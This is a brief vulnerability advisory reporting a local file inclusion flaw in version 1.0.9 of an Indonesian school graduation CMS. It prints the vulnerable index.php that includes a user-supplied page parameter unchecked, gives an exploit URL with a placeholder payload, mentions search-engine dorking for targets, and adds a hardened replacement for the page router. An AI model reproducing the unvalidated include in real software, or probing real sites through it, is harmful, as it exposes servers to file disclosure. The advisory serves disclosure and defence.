Authored by indoushka

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a local file inclusion vulnerability.

====================================================================================================================================
| # Title : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] LFI Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) |
| # Vendor : http://lulus.smkn2purwokerto.sch.id/admin.zip |
| # Dork : |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] The affected file : index.php

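<?php

require "config.php";
error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
// $page comes straight from the query string and is placed in the include path unvalidated.
$page = $_GET['page'];
$filename = "content/$page.php";
if (!file_exists($filename))
{
    include "content/home.php";
}
else
{
    // '@' suppresses any error raised by the include.
    @include "content/$page.php";
}
?>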

[+] LFI : /index.php?page= [Ev!l]
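
[+] Added example (not part of the original advisory and not the vendor's code): one way to harden the include in index.php shown above. It assumes legitimate page names contain only lowercase letters, digits, '_' and '-'; the function name resolve_page is hypothetical.

```php
<?php
// Added example: hardened replacement for the page router in index.php.
// Assumption: valid page names match [a-z0-9_-] and live directly in content/.
require "config.php"; // kept from the original index.php

/**
 * Map a requested page name to a file inside $baseDir.
 * Falls back to home.php when the name is malformed, missing,
 * or resolves to a location outside $baseDir.
 */
function resolve_page($page, $baseDir)
{
    $home = $baseDir . DIRECTORY_SEPARATOR . 'home.php';

    // Reject arrays (?page[]=x) and any character outside the allowed set.
    // This excludes '/', '\', '.', NUL bytes and stream-wrapper prefixes.
    if (!is_string($page) || !preg_match('/\A[a-z0-9_-]{1,64}\z/', $page)) {
        return $home;
    }

    // Canonicalise both paths; realpath() returns false for missing files.
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $target === false) {
        return $home;
    }

    // Defence in depth: the resolved file must still sit under content/
    // (covers symlinks that point elsewhere on disk).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return $home;
    }

    return $target;
}

$page = isset($_GET['page']) ? $_GET['page'] : 'home';

// No '@' operator here: include failures should reach the error log.
include resolve_page($page, __DIR__ . DIRECTORY_SEPARATOR . 'content');
```

Requests that fall back to home.php because of a rejected page value are worth logging, since they indicate probing of the parameter.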


====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================